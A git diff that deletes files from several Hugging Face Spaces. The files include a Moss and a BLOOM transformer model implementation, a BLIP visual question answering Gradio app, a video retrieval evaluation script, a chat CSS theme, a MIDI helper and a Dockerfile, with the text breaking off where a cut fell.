output_hidden_states is not None else self.config.output_hidden_states - ) - use_cache = use_cache if use_cache is not None else self.config.use_cache - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - if input_ids is not None and inputs_embeds is not None: - raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time") - elif input_ids is not None: - input_shape = input_ids.size() - input_ids = input_ids.view(-1, input_shape[-1]) - batch_size = input_ids.shape[0] - elif inputs_embeds is not None: - input_shape = inputs_embeds.size()[:-1] - batch_size = inputs_embeds.shape[0] - else: - raise ValueError("You have to specify either input_ids or inputs_embeds") - - device = input_ids.device if input_ids is not None else inputs_embeds.device - - if token_type_ids is not None: - token_type_ids = token_type_ids.view(-1, input_shape[-1]) - - if position_ids is not None: - position_ids = position_ids.view(-1, input_shape[-1]).long() - - if past_key_values is None: - past_length = 0 - past_key_values = tuple([None] * len(self.h)) - else: - past_length = past_key_values[0][0].size(-2) - - if position_ids is None: - position_ids = torch.arange(past_length, input_shape[-1] + past_length, dtype=torch.long, device=device) - position_ids = position_ids.unsqueeze(0).view(-1, input_shape[-1]) - - # Attention mask. - if attention_mask is not None: - if batch_size <= 0: - raise ValueError("batch_size has to be defined and > 0") - attention_mask = attention_mask.view(batch_size, -1) - # We create a 3D attention mask from a 2D tensor mask. - # Sizes are [batch_size, 1, 1, to_seq_length] - # So we can broadcast to [batch_size, num_heads, from_seq_length, to_seq_length] - # this attention mask is more simple than the triangular masking of causal attention - # used in OpenAI GPT, we just need to prepare the broadcast dimension here. - attention_mask = attention_mask[:, None, None, :] - - # Since attention_mask is 1.0 for positions we want to attend and 0.0 for - # masked positions, this operation will create a tensor which is 0.0 for - # positions we want to attend and the dtype's smallest value for masked positions. - # Since we are adding it to the raw scores before the softmax, this is - # effectively the same as removing these entirely. - attention_mask = attention_mask.to(dtype=self.dtype) # fp16 compatibility - attention_mask = (1.0 - attention_mask) * torch.finfo(self.dtype).min - - # Prepare head mask if needed - # 1.0 in head_mask indicate we keep the head - # attention_probs has shape bsz x num_attention_heads x N x N - # head_mask has shape n_layer x batch x num_attention_heads x N x N - head_mask = self.get_head_mask(head_mask, self.config.n_layer) - - if inputs_embeds is None: - inputs_embeds = self.wte(input_ids) - - hidden_states = inputs_embeds - - if token_type_ids is not None: - token_type_embeds = self.wte(token_type_ids) - hidden_states = hidden_states + token_type_embeds - - hidden_states = self.drop(hidden_states) - - output_shape = input_shape + (hidden_states.size(-1),) - - if self.gradient_checkpointing and self.training: - if use_cache: - logger.warning_once( - "`use_cache=True` is incompatible with `config.gradient_checkpointing=True`. Setting " - "`use_cache=False`..." - ) - use_cache = False - - presents = () if use_cache else None - all_self_attentions = () if output_attentions else None - all_hidden_states = () if output_hidden_states else None - for i, (block, layer_past) in enumerate(zip(self.h, past_key_values)): - if output_hidden_states: - all_hidden_states = all_hidden_states + (hidden_states,) - - if self.gradient_checkpointing and self.training: - - def create_custom_forward(module): - def custom_forward(*inputs): - # None for past_key_value - return module(*inputs, use_cache, output_attentions) - - return custom_forward - - outputs = torch.utils.checkpoint.checkpoint( - create_custom_forward(block), - hidden_states, - None, - attention_mask, - position_ids, - head_mask[i], - ) - else: - outputs = block( - hidden_states=hidden_states, - layer_past=layer_past, - attention_mask=attention_mask, - position_ids=position_ids, - head_mask=head_mask[i], - use_cache=use_cache, - output_attentions=output_attentions, - ) - - hidden_states = outputs[0] - if use_cache is True: - presents = presents + (outputs[1],) - - if output_attentions: - all_self_attentions = all_self_attentions + (outputs[2 if use_cache else 1],) - - hidden_states = self.ln_f(hidden_states) - - hidden_states = hidden_states.view(output_shape) - # Add last hidden state - if output_hidden_states: - all_hidden_states = all_hidden_states + (hidden_states,) - - if not return_dict: - return tuple(v for v in [hidden_states, presents, all_hidden_states, all_self_attentions] if v is not None) - - return BaseModelOutputWithPast( - last_hidden_state=hidden_states, - past_key_values=presents, - hidden_states=all_hidden_states, - attentions=all_self_attentions, - ) - - -@add_start_docstrings( - """ - The Moss Model transformer with a language modeling head on top. - """, - MOSS_START_DOCSTRING, -) -class MossForCausalLM(MossPreTrainedModel): - _keys_to_ignore_on_load_missing = [r"h\.\d+\.attn\.causal_mask"] - - def __init__(self, config): - super().__init__(config) - self.transformer = MossModel(config) - self.lm_head = nn.Linear(config.n_embd, config.vocab_size) - - # Initialize weights and apply final processing - self.post_init() - - def get_output_embeddings(self): - return self.lm_head - - def set_output_embeddings(self, new_embeddings): - self.lm_head = new_embeddings - - def prepare_inputs_for_generation(self, input_ids, past_key_values=None, **kwargs): - token_type_ids = kwargs.get("token_type_ids", None) - # only last token for inputs_ids if past is defined in kwargs - if past_key_values: - input_ids = input_ids[:, -1].unsqueeze(-1) - if token_type_ids is not None: - token_type_ids = token_type_ids[:, -1].unsqueeze(-1) - - attention_mask = kwargs.get("attention_mask", None) - position_ids = kwargs.get("position_ids", None) - - if attention_mask is not None and position_ids is None: - # create position_ids on the fly for batch generation - position_ids = attention_mask.long().cumsum(-1) - 1 - position_ids.masked_fill_(attention_mask == 0, 1) - if past_key_values: - position_ids = position_ids[:, -1].unsqueeze(-1) - - return { - "input_ids": input_ids, - "past_key_values": past_key_values, - "use_cache": kwargs.get("use_cache"), - "position_ids": position_ids, - "attention_mask": attention_mask, - "token_type_ids": token_type_ids, - } - - @add_start_docstrings_to_model_forward(MOSS_INPUTS_DOCSTRING.format("batch_size, sequence_length")) - @add_code_sample_docstrings( - checkpoint=_CHECKPOINT_FOR_DOC, - output_type=CausalLMOutputWithPast, - config_class=_CONFIG_FOR_DOC, - ) - def forward( - self, - input_ids: Optional[torch.LongTensor] = None, - past_key_values: Optional[Tuple[Tuple[torch.Tensor]]] = None, - attention_mask: Optional[torch.FloatTensor] = None, - token_type_ids: Optional[torch.LongTensor] = None, - position_ids: Optional[torch.LongTensor] = None, - head_mask: Optional[torch.FloatTensor] = None, - inputs_embeds: Optional[torch.FloatTensor] = None, - labels: Optional[torch.LongTensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - ) -> Union[Tuple, CausalLMOutputWithPast]: - r""" - labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*): - Labels for language modeling. Note that the labels **are shifted** inside the model, i.e. you can set - `labels = input_ids` Indices are selected in `[-100, 0, ..., config.vocab_size]` All labels set to `-100` - are ignored (masked), the loss is only computed for labels in `[0, ..., config.vocab_size]` - """ - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - transformer_outputs = self.transformer( - input_ids, - past_key_values=past_key_values, - attention_mask=attention_mask, - token_type_ids=token_type_ids, - position_ids=position_ids, - head_mask=head_mask, - inputs_embeds=inputs_embeds, - use_cache=use_cache, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - hidden_states = transformer_outputs[0] - - # make sure sampling in fp16 works correctly and - # compute loss in fp32 to match with mesh-tf version - # https://github.com/EleutherAI/gpt-neo/blob/89ce74164da2fb16179106f54e2269b5da8db333/models/gpt2/gpt2.py#L179 - lm_logits = self.lm_head(hidden_states).to(torch.float32) - - loss = None - if labels is not None: - # Shift so that tokens < n predict n - shift_logits = lm_logits[..., :-1, :].contiguous() - shift_labels = labels[..., 1:].contiguous() - # Flatten the tokens - loss_fct = CrossEntropyLoss() - loss = loss_fct(shift_logits.view(-1, shift_logits.size(-1)), shift_labels.view(-1)) - - loss = loss.to(hidden_states.dtype) - - if not return_dict: - output = (lm_logits,) + transformer_outputs[1:] - return ((loss,) + output) if loss is not None else output - - return CausalLMOutputWithPast( - loss=loss, - logits=lm_logits, - past_key_values=transformer_outputs.past_key_values, - hidden_states=transformer_outputs.hidden_states, - attentions=transformer_outputs.attentions, - ) - - @staticmethod - def _reorder_cache( - past_key_values: Tuple[Tuple[torch.Tensor]], beam_idx: torch.Tensor - ) -> Tuple[Tuple[torch.Tensor]]: - """ - This function is used to re-order the `past_key_values` cache if [`~PretrainedModel.beam_search`] or - [`~PretrainedModel.beam_sample`] is called. This is required to match `past_key_values` with the correct - beam_idx at every generation step. - """ - return tuple( - tuple(past_state.index_select(0, beam_idx.to(past_state.device)) for past_state in layer_past) - for layer_past in past_key_values - ) diff --git a/spaces/xuyingliKepler/autogenchat/README.md b/spaces/xuyingliKepler/autogenchat/README.md deleted file mode 100644 index 92b04fa200aeab6172b7d5c06b202a70be33b984..0000000000000000000000000000000000000000 --- a/spaces/xuyingliKepler/autogenchat/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Autogenchat -emoji: 🐢 -colorFrom: gray -colorTo: red -sdk: streamlit -sdk_version: 1.28.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/xxx1/vqa_blip_large/app.py b/spaces/xxx1/vqa_blip_large/app.py deleted file mode 100644 index 51181e4c1f3f6c37f14613eb628abce1d6076577..0000000000000000000000000000000000000000 --- a/spaces/xxx1/vqa_blip_large/app.py +++ /dev/null @@ -1,82 +0,0 @@ -import string -import gradio as gr -import requests -import torch - - -from transformers import BlipForQuestionAnswering, BlipProcessor - -device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') - -processor = BlipProcessor.from_pretrained("Salesforce/blip-vqa-capfilt-large") -model_vqa = BlipForQuestionAnswering.from_pretrained("Salesforce/blip-vqa-capfilt-large").to(device) -def inference_chat(input_image,input_text): - inputs = processor(images=input_image, text=input_text,return_tensors="pt") - inputs["max_length"] = 20 - inputs["num_beams"] = 5 - out = model_vqa.generate(**inputs) - return processor.batch_decode(out, skip_special_tokens=True)[0] - -with gr.Blocks( - css=""" - .message.svelte-w6rprc.svelte-w6rprc.svelte-w6rprc {font-size: 20px; margin-top: 20px} - #component-21 > div.wrap.svelte-w6rprc {height: 600px;} - """ -) as iface: - state = gr.State([]) - #caption_output = None - #gr.Markdown(title) - #gr.Markdown(description) - #gr.Markdown(article) - - with gr.Row(): - with gr.Column(scale=1): - image_input = gr.Image(type="pil") - with gr.Row(): - with gr.Column(scale=1): - chat_input = gr.Textbox(lines=1, label="VQA Input(问题输入)") - with gr.Row(): - clear_button = gr.Button(value="Clear", interactive=True) - submit_button = gr.Button( - value="Submit", interactive=True, variant="primary" - ) - with gr.Column(): - caption_output = gr.Textbox(lines=0, label="VQA Output(模型答案输出)") - - - image_input.change( - lambda: ("", "", []), - [], - [ caption_output, state], - queue=False, - ) - chat_input.submit( - inference_chat, - [ - image_input, - chat_input, - ], - [ caption_output], - ) - clear_button.click( - lambda: ("", [], []), - [], - [chat_input, state], - queue=False, - ) - submit_button.click( - inference_chat, - [ - image_input, - chat_input, - ], - [caption_output], - ) - - # examples = gr.Examples( - # examples=examples, - # inputs=[image_input, chat_input], - # ) - -iface.queue(concurrency_count=1, api_open=False, max_size=10) -iface.launch(enable_queue=True) \ No newline at end of file diff --git a/spaces/yangheng/Super-Resolution-Anime-Diffusion/RealESRGANv030/realesrgan/data/__init__.py b/spaces/yangheng/Super-Resolution-Anime-Diffusion/RealESRGANv030/realesrgan/data/__init__.py deleted file mode 100644 index 20d7df4af5007ba1b14bae40118fbd3fbe61f759..0000000000000000000000000000000000000000 --- a/spaces/yangheng/Super-Resolution-Anime-Diffusion/RealESRGANv030/realesrgan/data/__init__.py +++ /dev/null @@ -1,17 +0,0 @@ -import importlib -from basicsr.utils import scandir -from os import path as osp - -# automatically scan and import dataset modules for registry -# scan all the files that end with '_dataset.py' under the data folder -data_folder = osp.dirname(osp.abspath(__file__)) -dataset_filenames = [ - osp.splitext(osp.basename(v))[0] - for v in scandir(data_folder) - if v.endswith("_dataset.py") -] -# import all the dataset modules -_dataset_modules = [ - importlib.import_module(f"realesrgan.data.{file_name}") - for file_name in dataset_filenames -] diff --git a/spaces/yaoshining/text-generation-webui/css/chat_style-TheEncrypted777.css b/spaces/yaoshining/text-generation-webui/css/chat_style-TheEncrypted777.css deleted file mode 100644 index 7682011d7e9d9de4b9ee013ba9b92b71548df639..0000000000000000000000000000000000000000 --- a/spaces/yaoshining/text-generation-webui/css/chat_style-TheEncrypted777.css +++ /dev/null @@ -1,107 +0,0 @@ -/* All credits to TheEncrypted777: https://www.reddit.com/r/Oobabooga/comments/12xe6vq/updated_css_styling_with_color_customization_for/ */ - -.message { - display: grid; - grid-template-columns: 60px minmax(0, 1fr); - padding-bottom: 28px; - font-size: 18px; - /*Change 'Quicksand' to a font you like or leave it*/ - font-family: Quicksand, Arial, sans-serif; - line-height: 1.428571429; -} - -.circle-you { - background-color: gray; - border-radius: 1rem; - /*Change color to any you like to be the border of your image*/ - border: 2px solid white; -} - -.circle-bot { - background-color: gray; - border-radius: 1rem; - /*Change color to any you like to be the border of the bot's image*/ - border: 2px solid white; -} - -.circle-bot img, -.circle-you img { - border-radius: 10%; - width: 100%; - height: 100%; - object-fit: cover; -} - -.circle-you, .circle-bot { - /*You can set the size of the profile images here, but if you do, you have to also adjust the .text{padding-left: 90px} to a different number according to the width of the image which is right below here*/ - width: 135px; - height: 175px; -} - -.text { - /*Change this to move the message box further left or right depending on the size of your profile pic*/ - padding-left: 90px; - text-shadow: 2px 2px 2px rgb(0, 0, 0); -} - -.text p { - margin-top: 2px; -} - -.username { - padding-left: 10px; - font-size: 22px; - font-weight: bold; - border-top: 1px solid rgb(51, 64, 90); - padding: 3px; -} - -.message-body { - position: relative; - border-radius: 1rem; - border: 1px solid rgba(255, 255, 255, 0.459); - border-radius: 10px; - padding: 10px; - padding-top: 5px; - /*Message gradient background color - remove the line bellow if you don't want a background color or gradient*/ - background: linear-gradient(to bottom, #171730, #1b263f); -} - - /*Adds 2 extra lines at the top and bottom of the message*/ -.message-body:before, - .message-body:after { - content: ""; - position: absolute; - left: 10px; - right: 10px; - height: 1px; - background-color: rgba(255, 255, 255, 0.13); -} - -.message-body:before { - top: 6px; -} - -.message-body:after { - bottom: 6px; -} - -.message-body img { - max-width: 300px; - max-height: 300px; - border-radius: 20px; -} - -.message-body p { - margin-bottom: 0 !important; - font-size: 18px !important; - line-height: 1.428571429 !important; -} - -.dark .message-body p em { - color: rgb(138, 138, 138) !important; -} - -.message-body p em { - color: rgb(110, 110, 110) !important; -} diff --git a/spaces/yderre-aubay/midi-player-demo/src/common/song/selector.ts b/spaces/yderre-aubay/midi-player-demo/src/common/song/selector.ts deleted file mode 100644 index a0078808592ada4a53cf6e300e55d126e6d4b2c0..0000000000000000000000000000000000000000 --- a/spaces/yderre-aubay/midi-player-demo/src/common/song/selector.ts +++ /dev/null @@ -1,34 +0,0 @@ -import maxBy from "lodash/maxBy" -import { isTimeSignatureEvent } from "../track" -import Song from "./Song" - -export const getMeasureStart = (song: Song, tick: number) => { - if (song.conductorTrack === undefined) { - return null - } - - // get the nearest time signature - const timeSignature = maxBy( - song.conductorTrack.events - .filter(isTimeSignatureEvent) - .slice() - .filter((e) => e.tick <= tick), - (e) => e.tick, - ) - - if (timeSignature === undefined) { - return null - } - - // calculate the nearest measure beginning - const ticksPerMeasure = - ((song.timebase * 4) / timeSignature.denominator) * timeSignature.numerator - const numberOfMeasures = Math.floor( - (tick - timeSignature.tick) / ticksPerMeasure, - ) - - return { - tick: timeSignature.tick + numberOfMeasures * ticksPerMeasure, - timeSignature, - } -} diff --git a/spaces/yfyangd/PictureBookUnderstanding/BLIP/eval_retrieval_video.py b/spaces/yfyangd/PictureBookUnderstanding/BLIP/eval_retrieval_video.py deleted file mode 100644 index 07ebab7f41f6466f6f46130002e2e0df1266486a..0000000000000000000000000000000000000000 --- a/spaces/yfyangd/PictureBookUnderstanding/BLIP/eval_retrieval_video.py +++ /dev/null @@ -1,250 +0,0 @@ -''' - * Copyright (c) 2022, salesforce.com, inc. - * All rights reserved. - * SPDX-License-Identifier: BSD-3-Clause - * For full license text, see LICENSE.txt file in the repo root or https://opensource.org/licenses/BSD-3-Clause - * By Junnan Li -''' -import argparse -import os -import ruamel_yaml as yaml -import numpy as np -import random -import time -import datetime -import json -from pathlib import Path - -import torch -import torch.nn as nn -import torch.nn.functional as F -import torch.backends.cudnn as cudnn -import torch.distributed as dist -from torch.utils.data import DataLoader - -from models.blip_retrieval import blip_retrieval -import utils -from data.video_dataset import VideoDataset - - -@torch.no_grad() -def evaluation(model, data_loader, tokenizer, device, config): - # test - model.eval() - - metric_logger = utils.MetricLogger(delimiter=" ") - header = 'Evaluation:' - - print('Computing features for evaluation...') - start_time = time.time() - - texts = data_loader.dataset.text - num_text = len(texts) - text_bs = 256 - text_ids = [] - text_embeds = [] - text_atts = [] - for i in range(0, num_text, text_bs): - text = texts[i: min(num_text, i+text_bs)] - text_input = tokenizer(text, padding='max_length', truncation=True, max_length=35, return_tensors="pt").to(device) - text_output = model.text_encoder(text_input.input_ids, attention_mask = text_input.attention_mask, mode='text') - text_embed = F.normalize(model.text_proj(text_output.last_hidden_state[:,0,:])) - text_embeds.append(text_embed) - text_ids.append(text_input.input_ids) - text_atts.append(text_input.attention_mask) - - text_embeds = torch.cat(text_embeds,dim=0) - text_ids = torch.cat(text_ids,dim=0) - text_atts = torch.cat(text_atts,dim=0) - text_ids[:,0] = tokenizer.additional_special_tokens_ids[0] - - video_feats = [] - video_embeds = [] - for video, video_id in data_loader: - - B,N,C,W,H = video.size() - video = video.view(-1,C,W,H) - video = video.to(device,non_blocking=True) - video_feat = model.visual_encoder(video) - video_embed = model.vision_proj(video_feat[:,0,:]) - video_embed = video_embed.view(B,N,-1).mean(dim=1) - video_embed = F.normalize(video_embed,dim=-1) - - video_feat = video_feat.view(B,-1,video_feat.shape[-1]) - video_feats.append(video_feat.cpu()) - video_embeds.append(video_embed) - - video_feats = torch.cat(video_feats,dim=0) - video_embeds = torch.cat(video_embeds,dim=0) - - sims_matrix = video_embeds @ text_embeds.t() - score_matrix_v2t = torch.full((len(texts),len(texts)),-100.0).to(device) - - num_tasks = utils.get_world_size() - rank = utils.get_rank() - step = sims_matrix.size(0)//num_tasks + 1 - start = rank*step - end = min(sims_matrix.size(0),start+step) - - for i,sims in enumerate(metric_logger.log_every(sims_matrix[start:end], 50, header)): - topk_sim, topk_idx = sims.topk(k=config['k_test'], dim=0) - - encoder_output = video_feats[start+i].repeat(config['k_test'],1,1).to(device,non_blocking=True) - encoder_att = torch.ones(encoder_output.size()[:-1],dtype=torch.long).to(device,non_blocking=True) - output = model.text_encoder(text_ids[topk_idx], - attention_mask = text_atts[topk_idx], - encoder_hidden_states = encoder_output, - encoder_attention_mask = encoder_att, - return_dict = True, - ) - score = model.itm_head(output.last_hidden_state[:,0,:])[:,1] - score_matrix_v2t[start+i,topk_idx] = score + topk_sim - - sims_matrix = sims_matrix.t() - score_matrix_t2v = torch.full((len(texts),len(texts)),-100.0).to(device) - - step = sims_matrix.size(0)//num_tasks + 1 - start = rank*step - end = min(sims_matrix.size(0),start+step) - - for i,sims in enumerate(metric_logger.log_every(sims_matrix[start:end], 50, header)): - - topk_sim, topk_idx = sims.topk(k=config['k_test'], dim=0) - encoder_output = video_feats[topk_idx].to(device,non_blocking=True) - encoder_att = torch.ones(encoder_output.size()[:-1],dtype=torch.long).to(device,non_blocking=True) - output = model.text_encoder(text_ids[start+i].repeat(config['k_test'],1), - attention_mask = text_atts[start+i].repeat(config['k_test'],1), - encoder_hidden_states = encoder_output, - encoder_attention_mask = encoder_att, - return_dict = True, - ) - score = model.itm_head(output.last_hidden_state[:,0,:])[:,1] - score_matrix_t2v[start+i,topk_idx] = score + topk_sim - - if args.distributed: - dist.barrier() - torch.distributed.all_reduce(score_matrix_v2t, op=torch.distributed.ReduceOp.SUM) - torch.distributed.all_reduce(score_matrix_t2v, op=torch.distributed.ReduceOp.SUM) - - total_time = time.time() - start_time - total_time_str = str(datetime.timedelta(seconds=int(total_time))) - print('Evaluation time {}'.format(total_time_str)) - - return score_matrix_v2t.cpu().numpy(), score_matrix_t2v.cpu().numpy() - - - -@torch.no_grad() -def itm_eval(scores_v2t, scores_t2v, txt2vmg, vid2txt): - - #Video->Text - ranks = np.zeros(scores_v2t.shape[0]) - for index,score in enumerate(scores_v2t): - inds = np.argsort(score)[::-1] - ranks[index] = np.where(inds == vid2txt[index])[0][0] - - # Compute metrics - tr1 = 100.0 * len(np.where(ranks < 1)[0]) / len(ranks) - tr5 = 100.0 * len(np.where(ranks < 5)[0]) / len(ranks) - tr10 = 100.0 * len(np.where(ranks < 10)[0]) / len(ranks) - - #Text->Video - ranks = np.zeros(scores_t2v.shape[0]) - - for index,score in enumerate(scores_t2v): - inds = np.argsort(score)[::-1] - ranks[index] = np.where(inds == txt2vmg[index])[0][0] - - mdR = np.median(ranks+1) - - # Compute metrics - vr1 = 100.0 * len(np.where(ranks < 1)[0]) / len(ranks) - vr5 = 100.0 * len(np.where(ranks < 5)[0]) / len(ranks) - vr10 = 100.0 * len(np.where(ranks < 10)[0]) / len(ranks) - - tr_mean = (tr1 + tr5 + tr10) / 3 - vr_mean = (vr1 + vr5 + vr10) / 3 - r_mean = (tr_mean + vr_mean) / 2 - - eval_result = {'txt_r1': tr1, - 'txt_r5': tr5, - 'txt_r10': tr10, - 'txt_r_mean': tr_mean, - 'vid_r1': vr1, - 'vid_r5': vr5, - 'vid_r10': vr10, - 'vid_r_mean': vr_mean, - 'vid_mdR': mdR, - 'r_mean': r_mean} - return eval_result - - - - -def main(args, config): - utils.init_distributed_mode(args) - - device = torch.device(args.device) - - # fix the seed for reproducibility - seed = args.seed + utils.get_rank() - torch.manual_seed(seed) - np.random.seed(seed) - random.seed(seed) - cudnn.benchmark = True - - #### Dataset #### - print("Creating retrieval dataset") - test_dataset = VideoDataset(config['video_root'],config['ann_root'],num_frm=config['num_frm_test'], - max_img_size=config['image_size'], frm_sampling_strategy='uniform') - - test_loader = DataLoader( - test_dataset, - batch_size=config['batch_size'], - num_workers=4, - pin_memory=True, - drop_last=False, - shuffle=False, - ) - - #### Model #### - print("Creating model") - model = blip_retrieval(pretrained=config['pretrained'], image_size=config['image_size'], vit=config['vit']) - - model = model.to(device) - - model_without_ddp = model - if args.distributed: - model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu]) - model_without_ddp = model.module - - score_v2t, score_t2v, = evaluation(model_without_ddp, test_loader, model_without_ddp.tokenizer, device, config) - - if utils.is_main_process(): - - test_result = itm_eval(score_v2t, score_t2v, test_loader.dataset.txt2video, test_loader.dataset.video2txt) - print(test_result) - - log_stats = {**{f'{k}': v for k, v in test_result.items()},} - with open(os.path.join(args.output_dir, "test_result.txt"),"a") as f: - f.write(json.dumps(log_stats) + "\n") - - -if __name__ == '__main__': - parser = argparse.ArgumentParser() - parser.add_argument('--config', default='./configs/retrieval_msrvtt.yaml') - parser.add_argument('--output_dir', default='output/Retrieval_msrvtt') - parser.add_argument('--device', default='cuda') - parser.add_argument('--seed', default=42, type=int) - parser.add_argument('--world_size', default=1, type=int, help='number of distributed processes') - parser.add_argument('--dist_url', default='env://', help='url used to set up distributed training') - parser.add_argument('--distributed', default=True, type=bool) - args = parser.parse_args() - - config = yaml.load(open(args.config, 'r'), Loader=yaml.Loader) - - Path(args.output_dir).mkdir(parents=True, exist_ok=True) - - yaml.dump(config, open(os.path.join(args.output_dir, 'config.yaml'), 'w')) - - main(args, config) \ No newline at end of file diff --git a/spaces/yifangtongxing/qsign/Dockerfile b/spaces/yifangtongxing/qsign/Dockerfile deleted file mode 100644 index c33a0787f9bfc4eb7088822ae9e724bad601c068..0000000000000000000000000000000000000000 --- a/spaces/yifangtongxing/qsign/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -FROM python:3.9 - -WORKDIR /code - -COPY ./requirements.txt /code/requirements.txt -RUN python3 -m pip install --no-cache-dir --upgrade pip -RUN python3 -m pip install --no-cache-dir --upgrade -r /code/requirements.txt - -COPY . . - -CMD ["panel", "serve", "/code/app.py", "--address", "0.0.0.0", "--port", "7860", "--allow-websocket-origin", "*"] - -RUN mkdir /.cache -RUN chmod 777 /.cache -RUN mkdir .chroma -RUN chmod 777 .chroma \ No newline at end of file diff --git a/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/bloom/modeling_bloom.py b/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/bloom/modeling_bloom.py deleted file mode 100644 index d12ec1724f7097cdfedf6cfd6b2541ab74a9a1c2..0000000000000000000000000000000000000000 --- a/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/bloom/modeling_bloom.py +++ /dev/null @@ -1,1297 +0,0 @@ -# coding=utf-8 -# Copyright 2022 HuggingFace Inc. team and BigScience workshop. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -"""PyTorch BLOOM model.""" - -import math -import warnings -from typing import Optional, Tuple, Union - -import torch -import torch.utils.checkpoint -from torch import nn -from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, LayerNorm, MSELoss -from torch.nn import functional as F - -from ...file_utils import add_code_sample_docstrings, add_start_docstrings, add_start_docstrings_to_model_forward -from ...modeling_outputs import ( - BaseModelOutputWithPastAndCrossAttentions, - CausalLMOutputWithCrossAttentions, - QuestionAnsweringModelOutput, - SequenceClassifierOutputWithPast, - TokenClassifierOutput, -) -from ...modeling_utils import PreTrainedModel -from ...utils import logging -from .configuration_bloom import BloomConfig - - -logger = logging.get_logger(__name__) - -_CHECKPOINT_FOR_DOC = "bigscience/bloom-560m" -_CONFIG_FOR_DOC = "BloomConfig" - -BLOOM_PRETRAINED_MODEL_ARCHIVE_LIST = [ - "bigscience/bigscience-small-testing", - "bigscience/bloom-560m", - "bigscience/bloom-1b1", - "bigscience/bloom-1b7", - "bigscience/bloom-3b", - "bigscience/bloom-7b1", - "bigscience/bloom", -] - - -def _make_causal_mask( - input_ids_shape: torch.Size, device: torch.device, past_key_values_length: int -) -> torch.BoolTensor: - """ - Make causal mask used for self-attention. - """ - batch_size, target_length = input_ids_shape - mask = torch.empty((target_length, target_length + past_key_values_length), dtype=torch.bool, device=device) - # ONNX doesn't support `torch.Tensor.triu` properly, thus we use this workaround - seq_ids = torch.arange(target_length, device=device) - mask[:, past_key_values_length:] = seq_ids[:, None] < seq_ids[None, :] - - if past_key_values_length > 0: - mask[:, :past_key_values_length] = False - - expanded_mask = mask[None, None, :, :].expand(batch_size, 1, target_length, target_length + past_key_values_length) - return expanded_mask - - -def _expand_mask(mask: torch.Tensor, tgt_length: int) -> torch.BoolTensor: - """ - Expands attention_mask from `[batch_size, src_length]` to `[batch_size, 1, tgt_length, src_length]`. - """ - batch_size, src_length = mask.shape - tgt_length = tgt_length if tgt_length is not None else src_length - - expanded_mask = ~(mask[:, None, None, :].to(torch.bool)) - return expanded_mask.expand(batch_size, 1, tgt_length, src_length) - - -def build_alibi_tensor(attention_mask: torch.Tensor, num_heads: int, dtype: torch.dtype) -> torch.Tensor: - """ - Link to paper: https://arxiv.org/abs/2108.12409 Alibi tensor is not causal as the original paper mentions, it - relies on a translation invariance of softmax for quick implementation: with l being a tensor, and a fixed value - `softmax(l+a) = softmax(l)`. Based on - https://github.com/ofirpress/attention_with_linear_biases/blob/a35aaca144e0eb6b789dfcb46784c4b8e31b7983/fairseq/models/transformer.py#L742 - TODO @thomasw21 this doesn't work as nicely due to the masking strategy, and so masking varies slightly. - - Args: - Returns tensor shaped (batch_size * num_heads, 1, max_seq_len) - attention_mask (`torch.Tensor`): - Token-wise attention mask, this should be of shape (batch_size, max_seq_len). - num_heads (`int`, *required*): - number of heads - dtype (`torch.dtype`, *optional*, default=`torch.bfloat16`): - dtype of the output tensor - """ - batch_size, seq_length = attention_mask.shape - closest_power_of_2 = 2 ** math.floor(math.log2(num_heads)) - base = torch.tensor( - 2 ** (-(2 ** -(math.log2(closest_power_of_2) - 3))), device=attention_mask.device, dtype=torch.float32 - ) - powers = torch.arange(1, 1 + closest_power_of_2, device=attention_mask.device, dtype=torch.int32) - slopes = torch.pow(base, powers) - - if closest_power_of_2 != num_heads: - extra_base = torch.tensor( - 2 ** (-(2 ** -(math.log2(2 * closest_power_of_2) - 3))), device=attention_mask.device, dtype=torch.float32 - ) - num_remaining_heads = min(closest_power_of_2, num_heads - closest_power_of_2) - extra_powers = torch.arange(1, 1 + 2 * num_remaining_heads, 2, device=attention_mask.device, dtype=torch.int32) - slopes = torch.cat([slopes, torch.pow(extra_base, extra_powers)], dim=0) - - # Note: alibi will added to the attention bias that will be applied to the query, key product of attention - # => therefore alibi will have to be of shape (batch_size, num_heads, query_length, key_length) - # => here we set (batch_size=1, num_heads=num_heads, query_length=1, key_length=max_length) - # => the query_length dimension will then be broadcasted correctly - # This is more or less identical to T5's relative position bias: - # https://github.com/huggingface/transformers/blob/f681437203baa7671de3174b0fa583c349d9d5e1/src/transformers/models/t5/modeling_t5.py#L527 - arange_tensor = ((attention_mask.cumsum(dim=-1) - 1) * attention_mask)[:, None, :] - alibi = slopes[..., None] * arange_tensor - return alibi.reshape(batch_size * num_heads, 1, seq_length).to(dtype) - - -def dropout_add(x: torch.Tensor, residual: torch.Tensor, prob: float, training: bool) -> torch.Tensor: - """ - Dropout add function - - Args: - x (`torch.tensor`, *required*): - input tensor - residual (`torch.tensor`, *required*): - residual tensor - prob (`float`, *required*): - dropout probability - training (`bool`, *required*): - training mode - """ - out = F.dropout(x, p=prob, training=training) - out = residual + out - return out - - -def bloom_gelu_forward(x: torch.Tensor) -> torch.Tensor: - """ - Custom bias GELU function. Adapted from Megatron-DeepSpeed code. Here we use a simple implementation (inference) to - make the model 